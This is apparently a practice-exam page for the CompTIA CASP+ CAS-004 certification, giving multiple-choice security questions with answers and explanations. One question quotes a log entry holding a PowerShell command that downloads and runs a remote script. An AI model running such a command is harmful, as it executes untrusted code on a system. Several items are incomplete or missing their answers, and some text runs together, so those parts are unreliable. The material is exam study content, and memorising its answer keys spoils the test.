Practice Free CAS-004 Exam Online Questions
An accounting team member received a voicemail message from someone who sounded like the Chief Financial Officer (CFO). In the voicemail message, the caller requested a wire transfer to a bank account the organization had not used before.
Which of the following best describes this type of attack?
- A . The attacker used deepfake technology to simulate the CFO’s voice.
- B . The CFO tried to commit a form of embezzlement.
- C . The attacker used caller ID spoofing to imitate the CFO’s internal phone extension.
- D . The attacker successfully phished someone in the accounts payable department.
A
Explanation:
In this scenario, the voicemail requesting a wire transfer from an unfamiliar bank account is indicative of a deepfake attack, where attackers use advanced technology to simulate a person’s voice or likeness. Deepfake technology is increasingly being used in social engineering attacks to impersonate executives or trusted individuals. This attack attempts to manipulate employees by making them believe they are receiving legitimate requests from high-ranking personnel. CASP+ discusses advanced threats like deepfakes, which leverage AI to bypass traditional security awareness defenses.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations (Advanced Social Engineering Threats)
CompTIA CASP+ Study Guide: Social Engineering and Deepfake Risks
A software developer has been tasked with creating a unique threat detection mechanism that is based on machine learning. The information system for which the tool is being developed is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process.
Which of the following presents the most risk to the development life cycle and lo the ability to deliver the security tool on time?
- A . Deep learning language barriers
- B . Big Data processing required for maturity
- C . Secure, multiparty computation requirements
- D . Computing capabilities available to the developer
B
Explanation:
The most significant risk to the development of a machine-learning-based threat detection tool is the Big Data processing required for maturity. Machine learning models often require large datasets to train effectively, and processing and analyzing this data can be time-consuming and resource-intensive. This can delay the development timeline, especially in a rapid CI/CD pipeline environment where timely delivery is crucial. CASP+ highlights the challenges associated with machine learning and Big Data in security tool development, particularly the resource demands and the need for extensive data to ensure accuracy and maturity.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations (Big Data and Machine Learning Challenges)
CompTIA CASP+ Study Guide: Implementing and Managing Machine Learning in Security Environments
While performing mandatory monthly patch updates on a production application server, the security analyst reports an instance of buffer overflow for a new application that was migrated to the cloud and is also publicly exposed. Security policy requires that only internal users have access to the application.
Which of the following should the analyst implement to mitigate the issues reported? (Select two).
- A . Configure firewall rules to block all external traffic.
- B . Enable input validation for all fields.
- C . Enable automatic updates to be installed on all servers.
- D . Configure the security group to enable external traffic.
- E . Set up a DLP policy to alert for exfiltration on all application servers.
- F . Enable nightly vulnerability scans
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?
- A . NIDS
- B . NIPS
- C . WAF
- D . Reverse proxy
A
Explanation:
Reference:
https://subscription.packtpub.com/book/networking-and-servers/9781782174905/5/ch05lvl1sec38/differentiating-between-nids-and-nips
https://owasp.org/www-community/controls/Intrusion_Detection
A NIDS (Network Intrusion Detection System) is a security solution that monitors network traffic for signs of malicious activity, such as attacks, intrusions, or policy violations. A NIDS does not affect the availability of the company’s services because it operates in passive mode, which means it does not block or modify traffic. Instead, it alerts the network administrator or other security tools when it detects an anomaly or threat.
Reference:
https://www.cisco.com/c/en/us/products/security/what-is-network-intrusion-detection-system.html
https://www.imperva.com/learn/application-security/network-intrusion-detection-system-nids/
A company recently migrated its critical web application to a cloud provider’s environment. As part of the company’s risk management program, the company intends to conduct an external penetration test. According to the scope of work and the rules of engagement, the penetration tester will validate the web application’s security and check for opportunities to expose sensitive company information in the newly migrated cloud environment.
Which of the following should be the first consideration prior to engaging in the test?
- A . Prepare a redundant server to ensure the critical web application’s availability during the test.
- B . Obtain agreement between the company and the cloud provider to conduct penetration testing.
- C . Ensure the latest patches and signatures are deployed on the web server.
- D . Create an NDA between the external penetration tester and the company.
B
Explanation:
Before conducting a penetration test in a cloud environment, it is critical to first obtain permission from the cloud service provider. Cloud providers often have strict rules about penetration testing to avoid unintended service disruptions or violations of service agreements. Without this agreement, the company could face legal or operational consequences. This aligns with CASP+ best practices, which emphasize the importance of securing approval and understanding shared responsibility models in cloud environments before engaging in security testing.
Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Penetration Testing in Cloud Environments)
CompTIA CASP+ Study Guide: Cloud Security and Legal Considerations for Penetration Testing
An organization has severallegacy systemsthat are critical to testing currently deployed assets. These systems have become aserious riskto the organization’s security posture, and the securitymanager must implement protection measures to preventcritical infrastructurefrom being impacted. The systems must stayinterconnectedto allow communication with the deployed assets.
Which of the following designs, if implemented, woulddecrease the most risksbut still meet the requirements?
- A . Software-defined networking
- B . Containerization
- C . Air gap
- D . Screened subnet
D
Explanation:
Comprehensive and Detailed in-Depth
Problem Statement:
The organization needs tosecure legacy systemswhile maintaininginterconnectivitywith deployed assets.
Legacy systems are inherentlyvulnerableand canpose risksif directly connected to critical infrastructure.
Thegoalis to minimize risks withoutbreaking connectivity.
Why the Correct Answer is D (Screened Subnet):
Ascreened subnet(often called aDMZ – Demilitarized Zone) is anetwork segmentthat isolates potentially risky systems from theinternal network. It is typically placedbetween two firewalls:
One firewall separates the DMZ from theexternal network (internet).
The other firewall isolates the DMZ from theinternal network.
This setup allowscontrolled communicationbetween legacy systems and internal assets while minimizing risk.
Key Benefits of a Screened Subnet:
Isolation:Separates legacy systems from the critical internal network.
Controlled Access:Usesfirewall rulesto restrictinbound and outbound traffic.
Reduced Attack Surface:Limits the potential impact of acompromised legacy system.
Interconnectivity Maintenance:Enables communication withdeployed assetswithout direct exposure.
Example Scenario:
A company haslegacy industrial control systems (ICS)that need to interact withmodern monitoring tools.
Placing the ICS within ascreened subnetensures:
Data flow is regulated.
Monitoring systems can still accessICS data without risking full network exposure.
Compromise of thelegacy systemdoes not automatically mean compromise of thecore network.
Why the Other Options Are Incorrect:
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString (‘https://content.comptia.org/casp/whois.psl’);whois
Which of the following security controls would have alerted and prevented the next phase of the attack?
- A . Antivirus and UEBA
- B . Reverse proxy and sandbox
- C . EDR and application approved list
- D . Forward proxy and MFA
C
Explanation:
An EDR and whitelist should protect from this attack.
A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.
Which of the following should the security analyst perform?
- A . Contact the security department at the business partner and alert them to the email event.
- B . Block the IP address for the business partner at the perimeter firewall.
- C . Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
- D . Configure the email gateway to automatically quarantine all messages originating from the business partner.
A
Explanation:
The best option for the security analyst to perform is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick the employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate actions to protect their systems and users.
Verified Reference:
https://www.comptia.org/training/books/casp-cas-004-study-guide, https://us-cert.cisa.gov/ncas/tips/ST04-014
A security engineer has learned that terminated employees’ accounts are not being disabled. The termination dates are updated automatically in the human resources information system software by the appropriate human resources staff.
Which of the following would best reduce risks to the organization?
- A . Exporting reports from the system on a weekly basis to disable terminated employees’ accounts
- B . Granting permission to human resources staff to mark terminated employees’ accounts as disabled
- C . Configuring allowed login times for all staff to only work during business hours
- D . Automating a process to disable the accounts by integrating Active Directory and human resources information systems
D
Explanation:
The best way to reduce the risk of terminated employees’ accounts not being disabled is to automate the process by integrating Active Directory (AD) with the human resources information system (HRIS). By automating this integration, when an employee’s termination date is updated in the HRIS, the corresponding account in AD is automatically disabled, reducing the risk of accounts being left active after an employee leaves the organization. CASP+ highlights the importance of automating security processes, especially for user access management, to minimize human error and ensure timely action.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations (Automation of User Access Management)
CompTIA CASP+ Study Guide: Integration of HR Systems and Active Directory for Account Management
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?
- A . Assess the residual risk.
- B . Update the organization’s threat model.
- C . Move to the next risk in the register.
- D . Recalculate the magnitude of impact.